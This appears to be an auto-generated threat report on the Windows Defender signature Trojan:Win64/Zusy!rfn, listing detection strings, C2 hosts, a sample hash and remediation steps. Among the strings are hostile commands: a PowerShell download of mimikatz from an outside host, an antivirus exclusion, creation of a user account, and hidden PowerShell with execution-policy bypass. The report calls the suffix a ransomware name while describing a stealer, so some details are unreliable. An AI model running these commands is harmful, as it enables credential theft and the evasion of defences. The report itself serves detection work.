Trojan:Win64/Zusy!rfn - Windows Defender threat signature analysis

=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win64/Zusy!rfn
Classification:
Type: Trojan
Platform: Win64
Family: Zusy
Detection Type: Concrete
Known malware family with identified signatures
Suffix: !rfn
Specific ransomware family name
Confidence: Very High
False-Positive Risk: Low

Concrete signature match: Trojan (appears legitimate but performs malicious actions), targeting the 64-bit Windows platform, family Zusy

Summary:

This is a confirmed Trojan from the Zusy malware family that uses process hollowing to evade detection and injects itself into other processes. It drops multiple malicious DLLs for persistence and communicates with command-and-control (C2) servers to exfiltrate data or receive further instructions, indicating information-stealing capabilities.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - ftSK\ (PEHSTR_EXT)
 - Process hollowing complete (PEHSTR_EXT)
 - kqxcstfmcndwzigvhiotcmohs.dll (PEHSTR_EXT)
 - Control_RunDLL (PEHSTR_EXT)
 - Local\RustBacktraceMutex (PEHSTR_EXT)
 - Fsoiasgiosgiosagijsd (PEHSTR_EXT)
 - OIoijsg980segiosghj (PEHSTR_EXT)
 - ENDPOINTDLP.DLL (PEHSTR_EXT)
 - ping 192.168.3.2 -n 7 (PEHSTR_EXT)
 - c.tenor.com (PEHSTR_EXT)
 - troll-trollface.gif -o (PEHSTR_EXT)
 - 10.0.2.15:3000/hook.js (PEHSTR_EXT)
 - DnsHostnameToComputerNameW (PEHSTR_EXT)
 - FGBHNJMK.DLL (PEHSTR_EXT)
 - hiosjh98w4goiw4jserjh (PEHSTR_EXT)
 - fork5.dll (PEHSTR_EXT)
 - shibosjeg984gioserhjser (PEHSTR_EXT)
 - OjsjsofjAsjhgsrijhr (PEHSTR_EXT)
 - ASDFGH.DLL (PEHSTR_EXT)
 - MONIBUYVTY.DLL (PEHSTR_EXT)
 - TRCYTVUBI.DLL (PEHSTR_EXT)
 - DRCTF.DLL (PEHSTR_EXT)
 - fork8.dll (PEHSTR_EXT)
 - http://server.0569.microsoftmiddlename.tk (PEHSTR_EXT)
 - http://imgcache.cloudservicesdevc.tk (PEHSTR_EXT)
 - ProgramData/setting.ini (PEHSTR_EXT)
 - HipsTray.exe (PEHSTR_EXT)
 - vtrbytnuyki.dll (PEHSTR_EXT)
 - poofer_update.pdb (PEHSTR_EXT)
 - fork2.dll (PEHSTR_EXT)
 - Pasdogjseohejh (PEHSTR_EXT)
 - LshdgsikdjgoiQjsfohjf (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - c:\\Destro (PEHSTR_EXT)
 - INJECT_ENJOYERS.pdb (PEHSTR_EXT)
 - shample.ru (PEHSTR_EXT)
 - Shample.pdb (PEHSTR_EXT)
 - C:\TEMP\system.exe (PEHSTR_EXT)
 - C:\TEMP\SHAMple.dat (PEHSTR_EXT)
 - Software\SHAMple (PEHSTR_EXT)
 - Windows\CurrentVersion\Run (PEHSTR_EXT)
 - avtest\projects\RedTeam\c2implant\implant (PEHSTR_EXT)
 - yarttdn.de (PEHSTR_EXT)
 - C:\ProgramData\tnalpmi.exe (PEHSTR_EXT)
 - Exodus\exodus.wallet (PEHSTR_EXT)
 - Ethereum\keystore (PEHSTR_EXT)
 - Moonchild Productions\Pale Moon (PEHSTR_EXT)
 - Outlook\9375CFF0413111d3B88A00104B2A6676 (PEHSTR_EXT)
 - DLLExportViewer (PEHSTR_EXT)
 - Downloads\uhloader_[unknowncheats.me]_.dll (PEHSTR_EXT)
 - \Xor_Plus\Splash\Xor-hack.bmp (PEHSTR_EXT)
 - Data/Local/z.jpeg (PEHSTR_EXT)
 - /BanHwID/BanHwID.txt (PEHSTR_EXT)
 - GETSERVER2.0 (PEHSTR_EXT)
 - HsrjisrjAjsrihjr (PEHSTR_EXT)
 - OsjigjsrAjiejgiesj (PEHSTR_EXT)
 - BsohjirjAufiseighjseih (PEHSTR_EXT)
 - MshirAijseihjerh (PEHSTR_EXT)
 - OsojgeiherAijseijeh (PEHSTR_EXT)
 - KsoigjsAjshjrijh (PEHSTR_EXT)
 - Aogioswioghswoihjsrjh (PEHSTR_EXT)
 - KoiosdfhgiiIijshgisrjh (PEHSTR_EXT)
 - hjsgisegjoighjseihe (PEHSTR_EXT)
 - BsjiogsjgioAJIjsrgh (PEHSTR_EXT)
 - Kjsjoighsjrhgisrj (PEHSTR_EXT)
 - Jseiopsgopegiosjiohh (PEHSTR_EXT)
 - Bosdgiosigjsewihjseh (PEHSTR_EXT)
 - Vrheroigjw4oiughjser (PEHSTR_EXT)
 - cdn.discordapp.com/attachments/947450701154517052 (PEHSTR_EXT)
 - \yuki-module.dll (PEHSTR_EXT)
 - \dont_load.txt (PEHSTR_EXT)
 - \inject_version.txt (PEHSTR_EXT)
 - \lightcord-temp\extract.exe (PEHSTR_EXT)
 - .ropf (PEHSTR_EXT)
 - Project.Rummage.exe (PEHSTR_EXT)
 - @.ropf (PEHSTR_EXT)
 - \PostInstall\release\PostInstall.pdb (PEHSTR_EXT)
 - MRCorporation.exe (PEHSTR_EXT)
 - MRCorporation.Properties (PEHSTR_EXT)
 - MRCorporation.Properties.Resources.resources (PEHSTR_EXT)
 - MemberDefRidsAllocated.resources (PEHSTR_EXT)
 - tuiyumtynr.dll (PEHSTR_EXT)
 - odkrhnfld.dll (PEHSTR_EXT)
 - rgthryjt.dll (PEHSTR_EXT)
 - .themida (PEHSTR_EXT)
 - SteamService.exe (PEHSTR_EXT)
 - @.i815 (PEHSTR_EXT)
 - dmcommander.exe (PEHSTR_EXT)
 - naqspvwo.dll (PEHSTR_EXT)
 - datuorlp.dll (PEHSTR_EXT)
 - ComputeHash (PEHSTR_EXT)
 - CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL (PEHSTR_EXT)
 - \AutoRun.exe (PEHSTR_EXT)
 - E:\Projects\multiloader\bin\Release\inj.pdb (PEHSTR_EXT)
 - Setup=pdf.pdf (PEHSTR_EXT)
 - Setup=pdf.exe (PEHSTR_EXT)
 -          .exe (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 -                                                                    .exe (PEHSTR_EXT)
 - DPApp.com (PEHSTR_EXT)
 - C:\Users\Public\dwwmm.txt (PEHSTR_EXT)
 - /m1.txt (PEHSTR_EXT)
 - lW)/%;. (PEHSTR)
 - kljszdfyrweon34v9345,oireu (PEHSTR_EXT)
 - wsdlq.com/wg/wlbb.txt (PEHSTR_EXT)
 - Software\xcy\ml (PEHSTR_EXT)
 - xieyilei2001.ys168.com (PEHSTR_EXT)
 - 51mole.com (PEHSTR_EXT)
 - mole.61.com (PEHSTR_EXT)
 - wg148.com/newgo.html0 (PEHSTR_EXT)
 - zy.anjian.com/soft/xjl/xjl.php (PEHSTR_EXT)
 - xunxunjp.com/1018jp.txt (PEHSTR_EXT)
 - taskkill /f /t /im iphoneqq.exe (PEHSTR_EXT)
 - iwofeng.com/tc.txt (PEHSTR_EXT)
 - cmd.exe /c net user hello123 hellxxx_Hxxx (PEHSTR_EXT)
 - JS% (SNID)
 - 112.175.69.77 pk555.com 777wt.com www.777wt.com 79.sf923.com sf777.com www.sf99.cc sf99.cc www.meishipai.com jdmzd.com (PEHSTR_EXT)
 - 67.198.179.75 www.22cq.com www.3000okhaosf.com hao119.haole56.com www.sf63.com 456ok.45195.com 79.sf923.com www.53uc.com 53uc.com www.recairen.com (PEHSTR_EXT)
 - Program Files\xcdlq (PEHSTR_EXT)
 - Windows\diskpt.dat (PEHSTR_EXT)
 - Yrnjfb^YZwsokgc_Y[xtplhd`Y\ (PEHSTR_EXT)
 - wallet.tenpay.com/cgi-bin/v1.0/queryqb.cgi (PEHSTR_EXT)
 - http://%s:%d/%s/%s (PEHSTR_EXT)
 - %s%.8x.bat (PEHSTR_EXT)
 - SOFTWARE\GTplus (PEHSTR_EXT)
 - %s M %s -r -o+ -ep1 "%s" "%s\*" (PEHSTR_EXT)
 - ShellExecuteA (PEHSTR_EXT)
 - voipcall.taobao (PEHSTR_EXT)
 - qsyou.com (PEHSTR_EXT)
 - Svdrd.exe (PEHSTR_EXT)
 - Svdrd.Resources.resources (PEHSTR_EXT)
 - 43.136.234.140:7890/Cloud150/SSDTHook_IO_Link.txt (PEHSTR_EXT)
 - AQAQAQ.txt (PEHSTR_EXT)
 - ktkt.txt (PEHSTR_EXT)
 - CMD /C SC DELETE (PEHSTR_EXT)
 - windows\cache\mgr.vbs (PEHSTR_EXT)
 - ftp.forest-fire.net (PEHSTR_EXT)
 - workspace\ (PEHSTR_EXT)
 - 0\bin\Release\ADBlockMasterTray.pdb (PEHSTR_EXT)
 - 12N\{ (SNID)
 - MelonSpoofer_b2.Properties.Resources (PEHSTR_EXT)
 - Mkwimscxva.Properties.Resources (PEHSTR_EXT)
 - WindowsFormsApp47.Properties.Resources.resources (PEHSTR_EXT)
 - Phadgood.MdivideWxflysx (PEHSTR_EXT)
 - togetherfowlappear5yearsthe3saying.o6 (PEHSTR_EXT)
 - heavenmeatbeholdyou.rejseed (PEHSTR_EXT)
 - bcalledthey.retmayflyIY0r (PEHSTR_EXT)
 - Discord DM : _encrypt3d. (PEHSTR_EXT)
 - \StarHighSrcFixV3\Blue loader\Blue loader (PEHSTR_EXT)
 - I Follow You.dll (PEHSTR_EXT)
 - WinExec (PEHSTR_EXT)
 - WinHttpReceiveResponse (PEHSTR_EXT)
 - D:\Desktop\TheDLL\x64\Release\TheDLL.pdb (PEHSTR_EXT)
 - EasyAntiCheat.sys (PEHSTR_EXT)
 - EacExploit.pdb (PEHSTR_EXT)
 - \Device\injdrv (PEHSTR_EXT)
 - \DosDevices\injdrv (PEHSTR_EXT)
 - \Driver\injdrv (PEHSTR_EXT)
 - Failed to open file for writing. (PEHSTR_EXT)
 - stormss.xyz/api (PEHSTR_EXT)
 - Hus Loader.pdb (PEHSTR_EXT)
 - dsc.gg/rive (PEHSTR_EXT)
 - start cmd /C (PEHSTR_EXT)
 - HiveNightmare.pdb (PEHSTR_EXT)
 - //vegax.gg/windows/ui_ver.php (PEHSTR_EXT)
 - VegaX\VegaX\obj\Release\Vega X.pdb (PEHSTR_EXT)
 - HKEY_CURRENT_USER\Software\VegaX (PEHSTR_EXT)
 - /Vega X;component/spawnablewindows/injectcode.xaml (PEHSTR_EXT)
 - autoexec\vegaxfpsunlocker.txt (PEHSTR_EXT)
 - DllCanUnloadNow (PEHSTR_EXT)
 - DllEntry (PEHSTR_EXT)
 - taskkill /f /im ProcessHacker.exe (PEHSTR_EXT)
 - taskkill /f /im FiddlerEverywhere.exe (PEHSTR_EXT)
 - taskkill /f /im OllyDbg.exe (PEHSTR_EXT)
 - taskkill /f /im Ida64.exe (PEHSTR_EXT)
 - \\.\kprocesshacker (PEHSTR_EXT)
 - cdn.discordapp.com/attachments (PEHSTR_EXT)
 - 79.174.92.22 (PEHSTR_EXT)
 - WVY3KZnpiFVzltHbFlr5U2Z30T2llQB1ZKkUGcJVQFxtNW2NL1R3ppZZhpWDSlJhDFF1cFaVxjWVkd3JaWYH7Xw== (PEHSTR_EXT)
 - VWhB9a0JQyMHY1DeWJT6eTR1NcBMueBy0EEFnYwLGD8koFT8ZAMzYTXLmwtkBBZ2EW3M/7JBU/GcjM2rEy4HZLQ== (PEHSTR_EXT)
 - NOSKILL RAFA.pdb (PEHSTR_EXT)
 - powershell.exe-Command (PEHSTR_EXT)
 - Clear-RecycleBin -Force -ErrorAction SilentlyContinueC:\Users\Public (PEHSTR_EXT)
 - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartupUSERPROFILEFailed to get USERPROFILE (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Default\Login Data (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Local State (PEHSTR_EXT)
 - \AppData\Roaming\Microsoft\protects.zip (PEHSTR_EXT)
 - \AutoTorIP\obj\Debug\SecurSocks.pdb (PEHSTR_EXT)
 - powershell -NoProfile -ExecutionPolicy bypass -windowstyle hidden -Command (PEHSTR_EXT)
 - -NoProfile -windowstyle hidden -ExecutionPolicy bypass -Command  (PEHSTR_EXT)
 - NeekroAgain\Desktop\esp + aim meu ultimo\esp final testar coisas - Copia - Copia - Copia - Copia\Valorant-External-main\x64\Release (PEHSTR_EXT)
 - rasfdtyasdas.pdb (PEHSTR_EXT)
 - sdfgdfgfd.pdb (PEHSTR_EXT)
 - iasuidosdf.pdb (PEHSTR_EXT)
 - im MESTEResp final testar coisas - Copia - Copia - Copia - CopiaValorant - External - mainValorantOptimusPrinceps.ttf (PEHSTR_EXT)
 - retliften\secivreS\teSlortnoCtnerruC\METSYSs (PEHSTR_EXT)
 - stopify.co/news.php?tid=JBB69H.jpg (PEHSTR_EXT)
 - \AppData\Local\Temp\bin.exe (PEHSTR_EXT)
 - /tsoHbrKdetcirtseR (PEHSTR_EXT)
 - Pillager.dll (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - EncryptedLog.txt (PEHSTR_EXT)
 - KeyAndIV.txt (PEHSTR_EXT)
 - Seven.dll (PEHSTR_EXT)
 - v5.mrmpzjjhn3sgtq5w.pro (PEHSTR_EXT)
 - isapi/isapiv5.dll/v5 (PEHSTR_EXT)
 - pipe\vSDsGRFs62ghf (PEHSTR_EXT)
 - pipe\vsVSDDTGHGSy54 (PEHSTR_EXT)
 - CensoIBGE.RemoveCadastro.resources (PEHSTR_EXT)
 - del /s /f /q C:\Windows\Prefetch (PEHSTR_EXT)
 - deactivation.php?hash= (PEHSTR_EXT)
 - activation.php?code= (PEHSTR_EXT)
 - jmweczbxcvjsi (PEHSTR_EXT)
 - http://103.116.105.90/kyuc1/ (PEHSTR)
 - so2game_lite.exe (PEHSTR)
 - Tyrone.dll (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - Koi.Properties (PEHSTR_EXT)
 - settings\shop\type.txt (PEHSTR_EXT)
 - 04 - Downloads.lnk (PEHSTR_EXT)
 - Global\3pc6RWOgectGTFqCowxjeGy3XIGPtLwNrsr2zDctYD4hAU5pj4GW7rm8gHrHyTB6 (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - Execute (PEHSTR_EXT)
 - desktop.ini (PEHSTR_EXT)
 - FinalUncompressedSize (PEHSTR_EXT)
 - RtlGetCompressionWorkSpaceSize (PEHSTR_EXT)
 - System.Net (PEHSTR_EXT)
 - json:"iterator_slice" (PEHSTR_EXT)
 - main.DLLWMain (PEHSTR_EXT)
 - json:"client_id,omitempty (PEHSTR_EXT)
 - `.g.b.g.d.e.`.g.c.;.8. (PEHSTR_EXT)
 - $IM3YYFM.au3 (PEHSTR_EXT)
 - C:\$Recycle. (PEHSTR_EXT)
 - .ps1 (PEHSTR_EXT)
 - ps1 (PEHSTR_EXT)
 - ge.ps1 (PEHSTR_EXT)
 - \'cS@ (SNID)
 - System.Runtime (PEHSTR_EXT)
 - RuntimeCompatibilityAttribute (PEHSTR_EXT)
 - .ctor (PEHSTR_EXT)
 - .Security.Cryptography (PEHSTR_EXT)
 - riotclient://RiotClientServices.exe (PEHSTR_EXT)
 - server1.exe (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - StealerDLL\x64\Release\STEALERDLL.pdb (PEHSTR_EXT)
 - Monero\wallets (PEHSTR_EXT)
 - Thunderbird\Profiles (PEHSTR_EXT)
 - \Users\Public\webdata\info.dat (PEHSTR_EXT)
 - WebSvc ... RegisterMachine w_sUUID (PEHSTR_EXT)
 - /C taskkill /IM %s /F (PEHSTR_EXT)
 - \Google\Chrome\Application\chrome.exe" --restore-last-session (PEHSTR_EXT)
 - dash.zintrack.com (PEHSTR_EXT)
 - You can kill a people, but you can't kill an idea. Resistance will continue until the final liberation of all Palestinian lands, and it is only a matter of time. (PEHSTR_EXT)
 - yahhelper.no-ip.org (PEHSTR_EXT)
 - IP=%s ComputerName=%s UserName=%s Attacked=%d/%d/%d (PEHSTR_EXT)
 - TheComputerOfTheGhost (PEHSTR_EXT)
 - System.Security.Cryptography (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - \Stealler.pdb (PEHSTR_EXT)
 - DllImportAttribute (PEHSTR_EXT)
 - %userappdata%\RestartApp.exe (PEHSTR_EXT)
 - defOff.exe (PEHSTR_EXT)
 - GDI32.dll (PEHSTR_EXT)
 - 32.dll (PEHSTR_EXT)
 - 9.dll (PEHSTR_EXT)
 - System.IO (PEHSTR_EXT)
 - costura.costura.dll.compressed (PEHSTR_EXT)
 - TJprojMain.exe (PEHSTR_EXT)
 - %s:*:enabled:@shell32.dll,-1 (PEHSTR_EXT)
 - BaseOfDll (PEHSTR_EXT)
 - GET /livi.bin (PEHSTR_EXT)
 - \Data\Solutions\ (PEHSTR_EXT)
 - 0.pdb (PEHSTR_EXT)
 - WS2_32.dll (PEHSTR_EXT)
 - /new/net_api (PEHSTR_EXT)
 - powershell -Command  (PEHSTR_EXT)
 - GET / (PEHSTR_EXT)
 - 7N\efkidRdheeMgpx* (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run\W32Time (PEHSTR_EXT)
 - libgcj_s.dll (PEHSTR_EXT)
 - .rsrc (PEHSTR_EXT)
 - Microsoft.VisualBasic.Application (PEHSTR_EXT)
 - System. (PEHSTR_EXT)
 - .text (PEHSTR_EXT)
 - .rdata (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - D.text (PEHSTR_EXT)
 - .idata   (PEHSTR_EXT)
 - .taggant (PEHSTR_EXT)
 - Zn(X\ck+O|jvTG}!mcU@a^ (PEHSTR_EXT)
 - <description>Inno Setup</description> (PEHSTR_EXT)
 - Fsignature.compressed (PEHSTR_EXT)
 - Fakilaharios.Resources (PEHSTR_EXT)
 - ExecutionPolicy Bypass (PEHSTR_EXT)
 - discord.gg (PEHSTR_EXT)
 - ExclusionLoader.pdb (PEHSTR_EXT)
 - pfx.strongname.compressed (PEHSTR_EXT)
 - pfx.stgname.compressed (PEHSTR_EXT)
 - crt.pfx.compressed (PEHSTR_EXT)
 - bbggtth.exe (PEHSTR_EXT)
 - XSPCnxO3J5eKgrbQ3R.7ljbNpdbPT7 (PEHSTR_EXT)
 - my_new_hook_project.dll (PEHSTR_EXT)
 - lognationprimecarraro.com/settings/config2.zip (PEHSTR_EXT)
 - infinitycheats\GameHelpersLoader__NEW\bin\Release\net8.0\win-x64\native\GameHelpersLoader__NEW.pdb (PEHSTR_EXT)
 - cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe (PEHSTR_EXT)
 - cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR (PEHSTR_EXT)
 - lderd\Release\lderd.pdb (PEHSTR_EXT)
 - BobuxManRemastered.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Internet Settings (PEHSTR_EXT)
 - #Add-MpPreference -ExclusionPath C:\ (PEHSTR)
 - &$output = "$env:Temp/RuntimeBroker.exe (PEHSTR)
 - QStart-Process PowerShell -Verb RunAs "-NoProfile -ExecutionPolicy Bypass -Command (PEHSTR)
 - MGetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator (PEHSTR)
 - KTmV3LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAiSEtDVTpcUkNXTVxyYyIgLU5hbWUgIiRhcmdzIg (PEHSTR_EXT)
 - `.rdata (PEHSTR_EXT)
 - URlMON.dLl (PEHSTR_EXT)
 - ,/<-w (PEHSTR_EXT)
 - X.text (PEHSTR_EXT)
 - .gfcd (PEHSTR_EXT)
 - cmd.exe /C timeout /T 1 /NOBREAK >nul (PEHSTR_EXT)
 - TuoniAgent.dll (PEHSTR_EXT)
 - BK: Succesfully deleted registry key: HKEY_LOCAL_MACHINE\%s - "%s (PEHSTR_EXT)
 - taskmgr.exe (PEHSTR_EXT)
 - msconfig.exe (PEHSTR_EXT)
 - shutdown.exe (PEHSTR_EXT)
 - taskkill.exe (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - a-zA-Z0-9+/ (PEHSTR_EXT)
 - AlarmPlus.Properties.Resources.resources (PEHSTR_EXT)
 - +iJuBfovHhKMKXZfVv7Tv8WYJ62/Nvgh3jDNr3UCSUZFE5lLlmSt4pL5+ZbUjcZ6TfUgnUQP92yh9qYAwk/LQQ== (PEHSTR_EXT)
 - Unlocker.exe (PEHSTR_EXT)
 - DownloaderApp.exe (PEHSTR_EXT)
 - iDTHNqCQGIVt0KFQUh9NyrHXKGQ7j/aa (PEHSTR_EXT)
 - api.telegram.org/bot (PEHSTR_EXT)
 - main.obfuscateCommand (PEHSTR_EXT)
 - iDTHNqCQGIVt0KFQUh9NyrHXKGQ7j/aaE/SNKAszEoyZwX6Vb7GJggL5/KBLM14rSMqsGxRA+ucLjSsANNLFeQ== (PEHSTR_EXT)
 - E:\VS2010\VC\include\ (PEHSTR_EXT)
 - -> CD/DVD (PEHSTR_EXT)
 - http://195.66.27.77:5554/ (PEHSTR_EXT)
 -  _bound_build.exe (PEHSTR_EXT)
 - http://91.108.241.80:5554/ (PEHSTR_EXT)
 - tjgajdjrg.exe (PEHSTR_EXT)
 - http (PEHSTR_EXT)
 -  .exe (PEHSTR_EXT)
 - 195.66.27.77 (PEHSTR_EXT)
 - 84.21.189.158 (PEHSTR_EXT)
 - nbgtpasrg.exe (PEHSTR_EXT)
 - crypted_build.exe (PEHSTR_EXT)
 - kan\Desktop\den444\den444\obj\Debug\den444.pdb (PEHSTR_EXT)
 - /auto.AutoModeChromeGather (PEHSTR_EXT)
 - %s.tar.gz (PEHSTR_EXT)
 - bits-project/bits/util (PEHSTR_EXT)
 - gather.tH (PEHSTR_EXT)
 - r.tar.gzH (PEHSTR_EXT)
 - Release\sessionuserhost (PEHSTR_EXT)
 - http://176.46.152.62:5858/ (PEHSTR_EXT)
 - *_build.exe (PEHSTR_EXT)
 - http://176.46.152.62:5858/dadaasads_new.ps1 (PEHSTR_EXT)
 - powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File (PEHSTR_EXT)
 - den444.exe (PEHSTR_EXT)
 - .?AV_ (PEHSTR_EXT)
 - Obak.dll ofyh (PEHSTR_EXT)
 - Exercicio05.Properties.Resources (PEHSTR_EXT)
 - wctEE5D.tmp (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware associated with this threat:
Filename: 1ead277b73239b1e41be4c70c1bf9b850a9e99dcce938356b1a54b1f5ea1a61e
Hash: 1ead277b73239b1e41be4c70c1bf9b850a9e99dcce938356b1a54b1f5ea1a61e
Date: 05/12/2025
Remediation Steps:
Isolate the host from the network immediately. Perform a full antivirus scan to remove all malicious components. Since this is an information-stealing trojan, reset all passwords and credentials used on the compromised machine. Block the identified C2 domains and IPs at the firewall.
=== END REPORT ===